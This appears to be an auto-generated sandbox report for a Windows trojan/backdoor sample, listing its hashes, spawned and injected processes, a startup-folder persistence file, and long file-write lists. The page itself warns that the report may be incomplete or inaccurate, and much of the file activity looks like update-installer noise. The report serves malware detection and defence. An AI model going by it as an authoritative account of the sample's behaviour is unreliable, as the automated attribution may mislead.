Gen.Variant.Symmi.51967_8f378490f9

by malwarelabrobot on December 7th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.51967 (B) (Emsisoft), Gen:Variant.Symmi.51967 (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8f378490f99e113ecd5276d3b4c8669f
SHA1: c5b9a7e235941f465b24ec3de18cbf253ef53e82
SHA256: 1cdd8553c22ca3f4459c46456e28c3677489ec5806427328d6fb9e63700adca9
SSDeep: 6144:yd9HECpbvvL59VScmScwWYCMoQv7xUcBePEOCtur9idkVX:yd9HEC1TjUcH7BCMokCcBePEOCYrYkVX
Size: 299058 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-04-23 20:26:11
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mofcomp.exe:2760
WindowsXP-KB968930-x86-ENG.exe:368
ngen.exe:1788
ngen.exe:1024
ngen.exe:1236
ngen.exe:3784
ngen.exe:3820
ngen.exe:2312
ngen.exe:3872
ngen.exe:3944
ngen.exe:2268
ngen.exe:3388
ngen.exe:1152
ngen.exe:4024
ngen.exe:1584
ngen.exe:1032
ngen.exe:2256
ngen.exe:3664
ngen.exe:2116
ngen.exe:2212
%original file name%.exe:148
%original file name%.exe:1736
update.exe:576
PSCustomSetupUtil.exe:3920
PSCustomSetupUtil.exe:2868
PSCustomSetupUtil.exe:2908
PSCustomSetupUtil.exe:1784
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3320
PSCustomSetupUtil.exe:3000
PSCustomSetupUtil.exe:2424
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:2304
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2684
PSCustomSetupUtil.exe:500
PSCustomSetupUtil.exe:2460
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2704
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:2588
PSCustomSetupUtil.exe:3464
PSCustomSetupUtil.exe:224
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:3392
PSCustomSetupUtil.exe:780
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:2572
mscorsvw.exe:3568
wsmanhttpconfig.exe:1932
wsmanhttpconfig.exe:2476

The Trojan injects its code into the following process(es):

mscorsvw.exe:3848
svchost.exe:152
svchost.exe:316

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mofcomp.exe:2760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\95cb07fb380b69f02f8492ce2d5a\winrshost.exe (22 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_wildcards.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_while.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_signing.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.resources.dll (3153 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\filesystem.format.ps1xml (133 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_aliases.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_quoting_rules.help.txt (659 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmanhttpconfig.exe (3009 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_command_precedence.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pssetupnativeutils.exe (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_type_operators.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_parameters.help.txt (962 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_requirements.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe (7339 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_variables.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_faq.help.txt (775 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_do.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmprovhost.exe (657 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssessions.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssnapins.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_if.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_wmi_cmdlets.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_troubleshooting.help.txt (146 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.dll (14450 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershellcore.format.ps1xml (1492 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_output.help.txt (887 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_jobs.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrsmgr.dll (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll (5010 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_prompts.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\getevent.types.ps1xml (15 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.inf (2457 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrssrv.dll (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_eventlogs.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_preference_variables.help.txt (37 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_ise.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_ref.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll (38414 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spuninst.exe (3787 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmpty.xsl (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spupdsvc.exe (287 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spmsg.dll (495 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_return.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_line_editing.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_join.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_operators.help.txt (770 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.resources.dll (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowspowershellhelp.chm (26041 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_properties.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.exe (10748 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsman.format.ps1xml (837 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_debuggers.help.txt (21 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\types.ps1xml (2510 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pipelines.help.txt (411 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_transactions.help.txt (1011 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmwmipl.dll (2816 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.resources.dll (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_trap.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_profiles.help.txt (457 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.dll (1842 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshmsg.dll (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_providers.help.txt (59 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_throw.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshplugin.dll (802 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrscmd.dll (2907 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_locations.help.txt (794 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_methods.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_arrays.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.ver (14 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_language_keywords.help.txt (11 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe.mui (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_script_blocks.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_path_syntax.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll (3386 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_comment_based_help.help.txt (595 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_automatic_variables.help.txt (14 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pspluginwkr.dll (1756 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_assignment_operators.help.txt (379 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.exe (2526 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_reserved_words.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.dll (591 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll (3118 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wevtfwd.dll (3351 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.cmd (35 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\updspapi.dll (5940 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll-help.xml (16567 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.mof (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_methods.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.psd1 (950 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\dotnettypes.format.ps1xml (266 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_continue.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_modules.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_objects.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmsvc.dll (15909 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_jobs.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_arithmetic_operators.help.txt (168 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_bits_cmdlets.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_core_commands.help.txt (221 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_foreach.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_history.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssession_details.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_ws-management_cmdlets.help.txt (405 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.format.ps1xml (16 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_split.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_execution_policies.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmres.dll (6164 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\importallmodules.psd1 (438 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_for.help.txt (146 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\$shtdwn$.req (788 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_script_internationalization.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershelltrace.format.ps1xml (344 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\eventforwarding.adm (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions.help.txt (586 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_2.0.help.txt (453 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_types.ps1xml.help.txt (481 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\default.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\registry.format.ps1xml (20 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmplpxy.dll (603 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_hash_tables.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_session_configurations.help.txt (276 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\kb968930xp.cat (512 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_regular_expressions.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\profile.ps1 (772 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_escape_characters.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_special_characters.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.vbs (2727 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_environment_variables.help.txt (417 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_requires.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_job_details.help.txt (824 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_commonparameters.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_parsing.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshsip.dll (24 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_command_syntax.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_break.help.txt (792 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowsremoteshell.adm (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_logical_operators.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.resources.dll (562 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_comparison_operators.help.txt (11 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_scripts.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\spcustom.dll (23 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_scopes.help.txt (76 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.runtime.dll (33 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.resources.dll (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.ini (1956 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_format.ps1xml.help.txt (17 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_parameters.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_data_sections.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_try_catch_finally.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\eula.txt (586 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmtxt.xsl (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\certificate.format.ps1xml (155 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowsremotemanagement.adm (574 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_switch.help.txt (489 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.mof (789 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_redirection.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrs.exe (1154 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wtrinstaller.ico (4803 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\help.format.ps1xml (3947 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll (1145 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\diagnostics.format.ps1xml (590 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pscustomsetuputil.exe (316 bytes)

The Trojan deletes the following file(s):

C:\_130078_ (0 bytes)

The process ngen.exe:1788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:3820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:2312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)

The process ngen.exe:3872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:3944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:2268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)

The process ngen.exe:3388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:1152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:1584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:1032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:2256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)

The process ngen.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)

The process ngen.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)

The process ngen.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)

The process %original file name%.exe:148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startupx\system.pif (1425 bytes)

The process update.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%System%\config\SYSTEM.LOG (8521 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (4276 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
